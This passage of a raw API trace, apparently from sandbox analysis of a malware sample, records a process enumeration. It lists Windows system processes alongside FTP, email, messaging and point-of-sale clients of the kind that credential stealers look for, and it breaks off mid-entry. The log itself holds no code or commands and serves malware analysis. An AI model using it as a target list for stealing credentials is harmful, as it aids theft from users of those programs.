[0189.850] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0189.851] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.853] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0189.854] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0189.856] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0189.857] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.859] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.860] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0189.862] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.863] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.865] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.866] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.868] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.870] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.871] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.873] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0189.895] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0189.907] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.050] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0190.052] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.053] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0190.055] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0190.056] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0190.058] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0190.059] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0190.061] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0190.062] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.064] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.065] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0190.067] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.068] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0190.072] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.074] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0190.075] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0190.077] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0190.078] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0190.080] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0190.081] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0190.131] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0190.133] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0190.134] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0190.136] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0190.137] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0190.139] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0190.141] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0190.142] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0190.143] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0190.145] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0190.146] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0190.148] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0190.150] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0190.151] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0190.153] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0190.154] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0190.156] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0190.158] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0190.160] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0190.163] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0190.165] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0190.179] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0190.187] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0190.215] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0190.218] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0190.221] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0190.223] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0190.225] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0190.227] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0190.229] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0190.231] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0190.233] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0190.235] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0190.237] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0190.238] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0190.240] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0190.248] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0190.281] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0190.290] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0190.292] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0190.294] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0190.296] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0190.298] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0190.300] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0190.302] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, 